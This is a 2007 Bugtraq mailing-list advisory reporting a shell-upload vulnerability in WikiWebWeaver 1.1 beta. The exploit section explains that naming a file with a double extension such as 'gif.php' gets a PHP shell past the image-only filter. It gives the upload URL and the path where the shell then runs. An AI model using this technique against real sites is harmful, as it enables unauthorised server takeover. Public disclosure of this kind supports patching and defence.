[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070801094038.15633.qmail@securityfocus.com>
Date: 1 Aug 2007 09:40:38 -0000
From: yollubunlar@...lubunlar.org
To: bugtraq@...urityfocus.com
Subject: WikiWebWeaver 1.1 beta Upload Shell Vulnerability
Yollubunlar.Org
--------------------------------------------------------------------------------
Title : WikiWebWeaver 1.1 beta Upload Shell Upload Vulnerability
--------------------------------------------------------------------------------
#Author: Yollubunlar.Org
#cont@ct: yollubunlar@...mail.com
--------------------------------------------------------------------------------
Affected software description :
--------------------------------------------------------------------------------
Application : WikiWebWeaver 1.1
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Exploit:
WikiWebWeaver 1.0 beta 2 Script Have Upload part and you can upload only gif,jpeg lol :D
but you can upload gif.php or psd.php
http://www.site.com/wiki_path/index.php?upload
we upload a .gif.php or others than our shell go
http://www.site.com/wiki_path/data/documents/ourshell.gif.php :)
--------------------------------------------------------------------------------
greets:Yollubunlar.Org
--------------------------------------------------------------------------------
--------------------------------- [Yollubunlar.Org ] --------------------------------------
Powered by blists - more mailing lists